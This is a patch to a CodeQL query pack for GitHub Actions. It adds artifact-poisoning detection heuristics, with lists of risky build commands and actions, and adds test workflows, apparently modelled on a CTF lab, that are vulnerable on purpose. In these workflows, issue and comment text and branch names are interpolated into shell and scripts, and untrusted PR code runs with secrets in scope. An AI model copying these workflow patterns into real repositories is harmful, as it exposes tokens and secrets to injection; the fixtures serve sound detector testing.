Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + private class EventSource extends RemoteFlowSource { EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | @@ -137,7 +155,9 @@ private class EventSource extends RemoteFlowSource { isExternalUserControlledGollum(context) or isExternalUserControlledCommit(context) or isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) + isExternalUserControlledWorkflowRun(context) or + isExternalUserControlledRepositoryDispatch(context) or + isExternalUserControlledWorkflowDispatch(context) ) } From d504cd9b4d5c36ba1146d3b73acef52d801fad54 Mon Sep 17 00:00:00 2001 
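Review bot: The patterns in `isExternalUserControlledRepositoryDispatch` and `isExternalUserControlledWorkflowDispatch` name only the bare object or a numeric index (`github\\.event\\.inputs`, `github\\.event\\.inputs\\[[0-9]+\\]`), whereas the entries visible above them spell out full property paths. If `Utils::wrapRegexp` (not visible here) anchors the match as those entries suggest, the usual forms `github.event.inputs.<name>` and `github.event.client_payload.<field>` would not be recognised as sources. An extra entry such as `"github\\.event\\.inputs\\.[A-Za-z0-9_-]+"`, plus the `client_payload` equivalent, would cover them. Both events can normally be triggered only by someone holding write access or a repository token, so a short QLDoc on each predicate explaining why they are still modelled as external input would help alert triage. The commit adds no test workflow for either predicate.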
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:20:09 +0200 Subject: [PATCH 0204/1267] Better detection of poisonable steps --- .../security/ArtifactPoisoningQuery.qll | 53 ++++++- .../CWE-094/.github/workflows/level0.yml | 135 +++++++++++++++++ .../CWE-094/.github/workflows/level1.yml | 37 +++++ .../Security/CWE-094/CodeInjection.expected | 3 + .../CWE-094/PrivilegedCodeInjection.expected | 6 + .../.github/workflows/artifactpoisoning34.yml | 25 ++++ .../CWE-829/.github/workflows/level0.yml | 136 ++++++++++++++++++ .../.github/workflows/untrusted_checkout.yml | 7 + .../CWE-829/ArtifactPoisoning.expected | 3 + .../PrivilegedArtifactPoisoning.expected | 4 + .../CWE-829/UnpinnedActionsTag.expected | 1 + .../CWE-829/UntrustedCheckout.expected | 4 +- 12 files changed, 406 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d5c1567f8a5..95dc22a40de 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
@@ -230,16 +230,55 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { abstract class PoisonableStep extends Step { } -class CommandExecutionRunStep extends PoisonableStep, Run { - CommandExecutionRunStep() { +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 +private string dangerousActions() { + result = + ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] +} + +class DangerousActionUsesStep extends PoisonableStep, UsesStep { + DangerousActionUsesStep() { + exists(UntrustedArtifactDownloadStep step | + step.getAFollowingStep() = this and + this.getCallee() = dangerousActions() + ) + } +} + +// source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23 +private string dangerousCommands() { + result = + [ + "npm install", "npm run ", "yarn ", "npm ci(\\b|$)", "make ", "terraform plan", + "terraform apply", "gomplate ", "pre-commit run", "pre-commit install", "go generate", + "msbuild ", "mvn ", "./mvnw ", "gradle ", "./gradlew ", "bundle install", "bundle exec ", + "^ant ", "mkdocs build", "pytest" + ] +} + +class BuildRunStep extends PoisonableStep, Run { + BuildRunStep() { + exists(UntrustedArtifactDownloadStep step | + step.getAFollowingStep() = this and + exists( + this.getScript().splitAt("\n").trim().regexpFind("([^a-z]|^)" + dangerousCommands(), _, _) + ) + ) + } +} + +class LocalCommandExecutionRunStep extends PoisonableStep, Run { + LocalCommandExecutionRunStep() { exists(UntrustedArtifactDownloadStep step | step.getAFollowingStep() = this and // Heuristic: - // Run step with a command starting with `./xxxx`, `sh xxxx`, `node xxxx`, ... - // eg: `./test.sh`, `sh test.sh`, `node test.js`, ... - this.getScript() - .trim() - .regexpMatch(".*(./|(node|python|ruby|sh)\\s+)" + step.getPath() + ".*") + // Run step with a command starting with `./xxxx`, `sh xxxx`, ... 
+ exists( + this.getScript() + .splitAt("\n") + .trim() + .regexpFind("([^a-z]|^)(./|(ba|z|fi)?sh\\s+)" + step.getPath(), _, _) + ) ) } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml new file mode 100644 index 00000000000..ad9187a3d6b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml 
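Review bot: `LocalCommandExecutionRunStep` now matches only `./` and `sh`/`bash`/`zsh`/`fish`, so a step that runs a downloaded file through `node`, `python` or `ruby` is no longer a `PoisonableStep` unless a `dangerousCommands()` string also appears. The alternation this hunk removes covered those interpreters. If the narrowing is not intended, keep them in the group: `.regexpFind("([^a-z]|^)(\\./|(node|python|ruby|(ba|z|fi)?sh)\\s+)" + step.getPath(), _, _)`. The same expression leaves the `.` in `./` unescaped (as do `./mvnw ` and `./gradlew `) and concatenates `step.getPath()` into the pattern as-is, so a path containing regex metacharacters changes what is matched. Several `dangerousCommands()` entries also require a trailing space (`yarn `, `make `, `mvn `), so a bare `yarn` or `make` at the end of a script line is missed.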
@@ -0,0 +1,135 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. 
Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml new file mode 100644 index 00000000000..826051dfc5a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml 
@@ -0,0 +1,37 @@ +name: Poutine Level 1 +on: + workflow_run: + workflows: ["Poutine Level 0"] + types: + - completed + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + toppings-for-realz: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'workflow_run' && github.event.workflow_run.event == 'pull_request' + permissions: + id-token: write + contents: write + pull-requests: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ: ${{ secrets.FLAG_GRAVY_OVERFLOW_L1_TOPPINGS_FOR_REALZ }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: actions/first-interaction@v1 + with: + repo-token: ${{ secrets.GITHUB_TOKEN }} + issue-message: 'Message that will be displayed on users first issue' + pr-message: 'Message that will be displayed on users first pr' + - name: Log test executions + run: | + echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index f242e0e9e68..785aaa383eb 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -153,6 +153,9 @@ nodes | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index ec9a5e5238a..5b2dac260de 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -153,6 +153,9 @@ nodes | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | semmle.label | toJSON(github.event.issue.title) | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -269,6 +272,9 @@ subpaths | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml new file mode 100644 index 00000000000..905a4eaccb1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip foo/artifact_name.zip + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml new file mode 100644 index 00000000000..49908b7b4c5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml 
@@ -0,0 +1,136 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_FRIES: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_FRIES }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - uses: rlespinasse/github-slug-action@v4 + with: + short-length: 8 + - name: Check for profanities in issue body + id: check_profanities + run: | + echo "Checking issue body for profanities..." + PROFANITIES_LIST="bad|disguting|horrible" + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + echo "Profanity detected in issue body. Please clean up the language." + exit 1 + else + echo "No profanities found in issue body." + exit 0 + fi + + cheddar: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issue_comment' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_CHEDDAR: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_CHEDDAR }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Mini Chat Bot + uses: actions/github-script@v5 + with: + script: | + const commentBody = "${{ github.event.comment.body }}"; + let response; + if (commentBody.includes("hello")) { + response = "Hello! How can I help you today?"; + } else if (commentBody.includes("help")) { + response = "Sure, what do you need help with?"; + } else { + response = "Sorry, I didn't understand that. 
Can you try again?"; + } + + github.rest.issues.createComment({ + issue_number: context.payload.issue.number, + owner: context.repo.owner, + repo: context.repo.repo, + body: response + }); + + gravy: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request_target' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_GRAVY: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_GRAVY }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + npm start + + toppings: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'pull_request' + permissions: + id-token: write + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + FLAG_GRAVY_OVERFLOW_L0_TOPPINGS: ${{ secrets.FLAG_GRAVY_OVERFLOW_L0_TOPPINGS }} + steps: + - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 + with: + egress-policy: audit + - name: Checkout PR code + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 6bcdcbb4291..1160497a4a3 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml 
@@ -13,3 +13,10 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 21 + - run: | + npm install + npm run lint diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 99f9fb0e540..429a4cdc0c5 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -6,6 +6,7 @@ edges | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | 
@@ -26,6 +27,8 @@ nodes | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index ca1fef5fa85..ba635b1d74d 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected 
@@ -6,6 +6,7 @@ edges | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | @@ -26,6 +27,8 @@ nodes | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | 
@@ -45,6 +48,7 @@ subpaths | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Run Step | | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 7bee36029d6..0ba7832e8e8 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -13,4 +13,5 @@ | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 